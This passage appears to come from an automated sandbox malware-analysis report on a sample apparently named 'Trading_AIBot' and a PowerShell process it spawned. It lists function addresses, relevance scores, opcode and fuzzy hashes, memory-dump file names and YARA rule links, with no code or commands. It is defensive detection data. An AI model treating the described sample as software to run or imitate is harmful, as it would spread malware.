                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 68abf5d8f7247810f4d480044fb4787665a305a0d5258dd440cff32a29488052
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: d6da8b15a1f6f6e80e2d0182692ff1ce8b17181a3bc2e057842ac87f865832a0
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 68abf5d8f7247810f4d480044fb4787665a305a0d5258dd440cff32a29488052
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8641ACB1D00248DFDB14DFEAD584ADEBFF9AF88300F14842AE459AB254D7746885CF50
                                                                                                                                                                                                                                                                                                                                  Function 010373A3 Relevance: .1, Instructions: 80COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2796892978.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1030000_Trading_AIBot.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: e8ba09155e01f73a599af9ac6915ca47b6bee668f2c40484f35526dd3b006184
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: b8d41139f10657d2c0a6595110035924ba0bff86b123ec6446bf12280105d7c1
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e8ba09155e01f73a599af9ac6915ca47b6bee668f2c40484f35526dd3b006184
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C331E474E052098FCB04DFB4D451AEEBBB2EF89304F1094AAD455B73A0DB365D42CBA5
                                                                                                                                                                                                                                                                                                                                  Function 010373B0 Relevance: .1, Instructions: 76COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2796892978.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1030000_Trading_AIBot.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 58008d7713a78849ed8ef943af92b47355f598c4048f26ce9e750292def07696
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 4432ca65b4b67c2e3aca4755af0b2617bc2cd07f5d24c978cdcd6d975c8da9dd
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 58008d7713a78849ed8ef943af92b47355f598c4048f26ce9e750292def07696
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3421C074E002098FCB08DBB5D450AEEB7B2EF89300F109469D455B7390DB366D41CBA5
                                                                                                                                                                                                                                                                                                                                  Function 010351FA Relevance: .1, Instructions: 57COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2796892978.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1030000_Trading_AIBot.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 73201b983c81670b65201b4b3dc17382e259ad0feafbc3f5be3951d40e3c3980
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 71754ee3e2cdc57218364d4f7acc63aa755a7bbdb41f59717b92bc48e0f2889e
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 73201b983c81670b65201b4b3dc17382e259ad0feafbc3f5be3951d40e3c3980
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D911E076C0D3868FD7058B70D9193ADBFB0EF43301F09089AD096A31A3DB384606CB62
                                                                                                                                                                                                                                                                                                                                  Function 01035234 Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2796892978.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1030000_Trading_AIBot.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 0c74bd5992605848cb0cba7556fcc2ee65e1a99d34c35e9fb2dd56b4726e4e8f
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 9ea10bbbf487dd74eed98f626088ae8f0ac2915dc460ca732089f94c63d732a3
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0c74bd5992605848cb0cba7556fcc2ee65e1a99d34c35e9fb2dd56b4726e4e8f
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 46015E70C0021ADFDB04EFB9C5187AEBFF0EB46302F0098A99416A32A0DB784644CF50
                                                                                                                                                                                                                                                                                                                                  Function 01035238 Relevance: .0, Instructions: 44COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2796892978.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1030000_Trading_AIBot.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 22ea0d4331c278669c43534acd1321dd37265dba01ae85fed626fedfa564a0c7
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 8757e9ab7239b66a53bee4e12e5289be105835ee45fb04199b6ac442bcea5923
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 22ea0d4331c278669c43534acd1321dd37265dba01ae85fed626fedfa564a0c7
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E5011A70C4521ADFDB44EFB9C5197AEBFF0EB46306F0098A99416A32A1DB784644CF91
                                                                                                                                                                                                                                                                                                                                  Function 01036C3E Relevance: .0, Instructions: 30COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2796892978.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1030000_Trading_AIBot.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 93f224edd75fd5a9b80bfd5f6f06643728282c8c42b59674ac69ea37dc8f1300
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 8fd5c804f02f929036ec3dffcb5e12d47558bd8489c5bfd89e25fd6ee12689af
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 93f224edd75fd5a9b80bfd5f6f06643728282c8c42b59674ac69ea37dc8f1300
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 74F08C79D00156CFCB64DFB8D4487BCBBB0EF4A302F0060A6D009A7220CB309A86CF14
                                                                                                                                                                                                                                                                                                                                  Function 010374A3 Relevance: .0, Instructions: 24COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2796892978.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1030000_Trading_AIBot.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: d9bbf3025362048592be606977634916d6f6fc6fd2443c9a7d45a334488931a5
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: b8bac4f45d07984d550df80418ea0f1513640ea10de665e463ed39e1c26f0d21
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d9bbf3025362048592be606977634916d6f6fc6fd2443c9a7d45a334488931a5
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F5F092B8915104DFC744EF68E984958BFB0FB49322F1042A8E809973A0EB309D46CB40
                                                                                                                                                                                                                                                                                                                                  Function 01036758 Relevance: .0, Instructions: 24COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2796892978.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1030000_Trading_AIBot.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 3be5adaeceb91cd0c1e7609b94c0a401d3d40b5ac8b1c395653fba5f8b877ca8
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 9054d8354807ea1dcc3818980dd7ff08a13aa2992ffd324ee8303cc087c82520
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3be5adaeceb91cd0c1e7609b94c0a401d3d40b5ac8b1c395653fba5f8b877ca8
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 91E022B094A148EFCB01DFB8E60569DBFB5EB01301F0085FAD809A3251EB3A0F16C781
                                                                                                                                                                                                                                                                                                                                  Function 010374A8 Relevance: .0, Instructions: 22COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2796892978.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1030000_Trading_AIBot.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 499ff3348c78e8aede7628a38fbfd38ffa70004ab467a54000b4d9778bd97a0d
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 027178ce26e414ce586f2dbfc654e10c7c6d8d9f47cc8d0b7a6dd36bd0d0f0a5
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 499ff3348c78e8aede7628a38fbfd38ffa70004ab467a54000b4d9778bd97a0d
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 54E0DFB8911208DFC344EF78E988A59BFF0FB48312F1041E8D80897360EB30AD41CB80
                                                                                                                                                                                                                                                                                                                                  Function 01037A42 Relevance: .0, Instructions: 21COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2796892978.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1030000_Trading_AIBot.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 303a594bd93f79c3d654ca0d858c6755030f057412b2c51150b19ac9330a7dbc
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: a564580d9327426acdc0ea006776542419b979ca97264d1595e2413fe6500d3e
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 303a594bd93f79c3d654ca0d858c6755030f057412b2c51150b19ac9330a7dbc
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5DD02EF1805104ABDA108FE9B801A683F2CD3C2233F0002A4F09C52282E7720213C391
                                                                                                                                                                                                                                                                                                                                  Function 01036768 Relevance: .0, Instructions: 20COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2796892978.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1030000_Trading_AIBot.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 86877cebab9ddfa207fb5cfa3d9f2c9b75fd33a69dbf6815f44ef46c301a0e3c
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 650ae155001c3639b1f0b5b395a49673f594a9dde37e459fd50bcf1eba3af563
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 86877cebab9ddfa207fb5cfa3d9f2c9b75fd33a69dbf6815f44ef46c301a0e3c
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 76E08670511108EFD701EFB8E605A9DB7F9EB44305F4085A9E409A3255EB365F14D780
                                                                                                                                                                                                                                                                                                                                  Function 01036D40 Relevance: .0, Instructions: 16COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2796892978.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1030000_Trading_AIBot.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 925b18ae985623466fb59906d05e01b7c2c3da5336f35258ee9e5cc69822dd63
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: ed1dca16c61b39d0d82dedd815a5ddc1f97f28189a4c628e2e5eeab245fd7261
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 925b18ae985623466fb59906d05e01b7c2c3da5336f35258ee9e5cc69822dd63
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 77D0A770C05245DBC355EBA4A60E769BB6CDB02216F44009DD44426111FB758691C7DA
                                                                                                                                                                                                                                                                                                                                  Function 01037A50 Relevance: .0, Instructions: 13COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2796892978.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1030000_Trading_AIBot.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 09c41ed580f58824cca4443030915ef9edf5fd506faf4de9c84dc49438a3f3ed
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 8e3538d5ad1e38ec8811a0cafb3df3a251dfe9b0ae3851e9a05f1b89d29294af
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 09c41ed580f58824cca4443030915ef9edf5fd506faf4de9c84dc49438a3f3ed
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E7C080B08152089FD310DFF9E8047557F7CE742323F400198E54853210DB714550C795
                                                                                                                                                                                                                                                                                                                                  Function 01036D50 Relevance: .0, Instructions: 13COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2796892978.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_1030000_Trading_AIBot.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 37f4fc029d46e4115a93942b4a6c138b4791a945ad8b6de414c5352512fe182c
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 6b46fa72ba1b97ec5d7192d4d2346feaa7e32a96eabbbaeae41f256b1bc5d203
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 37f4fc029d46e4115a93942b4a6c138b4791a945ad8b6de414c5352512fe182c
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: ECC08070C552099FC314DFA9E408B55BB7CDB02313F4001A8E50853115EB724550C7A6

                                                                                                                                                                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                                                                                                                                                                  Function 04FDB470 Relevance: .3, Instructions: 261COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2502276903.0000000004FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_4fd0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 84284f6b23b286c7e265503a69824a64d3fd1b2411f0203b3d9db5b96cc6a2f8
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 4aaf614f7f6aec71404223b5be5f942d39a808a7820592b9c8175f1cff79ca4f
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 84284f6b23b286c7e265503a69824a64d3fd1b2411f0203b3d9db5b96cc6a2f8
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EA918174E007145BDB19EFB484106AEBBA3EFC4604B04C91DD58AAB740DF34AD068BEA
                                                                                                                                                                                                                                                                                                                                  Function 04FDB490 Relevance: .3, Instructions: 252COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2502276903.0000000004FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_4fd0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: af8f73242bc521c21b16109e0cab9e0841bc77e4eebd30b68d1ba0ff81659761
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: bc84a7b9c41ff035cc9b053f11a08e192a0b783271fa3346a96047fb0ed318af
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: af8f73242bc521c21b16109e0cab9e0841bc77e4eebd30b68d1ba0ff81659761
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8C918074F007155BDB19EFB484106AEB7A3EFC4604B14C91DD54AAB340EF34AD068BEA
                                                                                                                                                                                                                                                                                                                                  Function 07E43CE8 Relevance: 5.6, Strings: 4, Instructions: 567COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2649303333.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7e40000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID: 4']q$4']q$4']q$4']q
                                                                                                                                                                                                                                                                                                                                  • API String ID: 0-1785108022
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 92cc2af8347e6010e63a4c78f162399cee5d999e878e74306ff864e4250d5086
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 641f652c944a04fcd325ba7bc150223a5b4cf7ba0c444ec7e0f5a5eda6558617
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 92cc2af8347e6010e63a4c78f162399cee5d999e878e74306ff864e4250d5086
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 89126CB17053818FCB258B68A41076ABBB29FD2314F1484BAD505DF392DB35DD85C7A2
                                                                                                                                                                                                                                                                                                                                  Function 07E428E8 Relevance: 1.4, Strings: 1, Instructions: 155COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2649303333.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7e40000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID: _
                                                                                                                                                                                                                                                                                                                                  • API String ID: 0-701932520
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 0e442c08e7d553b310aa8d46a2e1138960c557a2a7c1edd3d6bb18925830feaf
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 02b3fd1930b31725c20cfc07f5b19904eb7cd46568beee3b7531c27f49f9441e
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0e442c08e7d553b310aa8d46a2e1138960c557a2a7c1edd3d6bb18925830feaf
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 04515AB17052459FCB219B7C9910B6ABBEAEFC5315F0080B6EB04CB252CE359D41C3B2
                                                                                                                                                                                                                                                                                                                                  Function 04FD6FE0 Relevance: 1.4, Strings: 1, Instructions: 114COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2502276903.0000000004FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_4fd0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID: (aq
                                                                                                                                                                                                                                                                                                                                  • API String ID: 0-600464949
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: f6ddbd800452d4454326839b3440800b23290b7b351912b0959bddae150160a6
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: e0483e9c249aa8601afd58c50a5f8dd393845a99f1695f59e7172170109383e6
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f6ddbd800452d4454326839b3440800b23290b7b351912b0959bddae150160a6
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 81414F34B042058FCB15EF68C558AAEBBF2EF8D315F194099E406AB395DB35ED02CB61
                                                                                                                                                                                                                                                                                                                                  Function 04FDAF98 Relevance: 1.3, Strings: 1, Instructions: 81COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2502276903.0000000004FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_4fd0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID: (&]q
                                                                                                                                                                                                                                                                                                                                  • API String ID: 0-1343553580
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 0f3e0585e8f188131cbd5bee09b04c82429654876de2ec38b9521f24ec4c2430
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 056301ad5f35583d9cc6c2ab7bf826152f4bf973266205fc6784431224cc407c
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0f3e0585e8f188131cbd5bee09b04c82429654876de2ec38b9521f24ec4c2430
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0421B271E042588FCB14DFAED4047AEBFF6EF89320F15846AD508A7340CA75A845CBE5
                                                                                                                                                                                                                                                                                                                                  Function 07E41990 Relevance: .2, Instructions: 196COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2649303333.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7e40000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
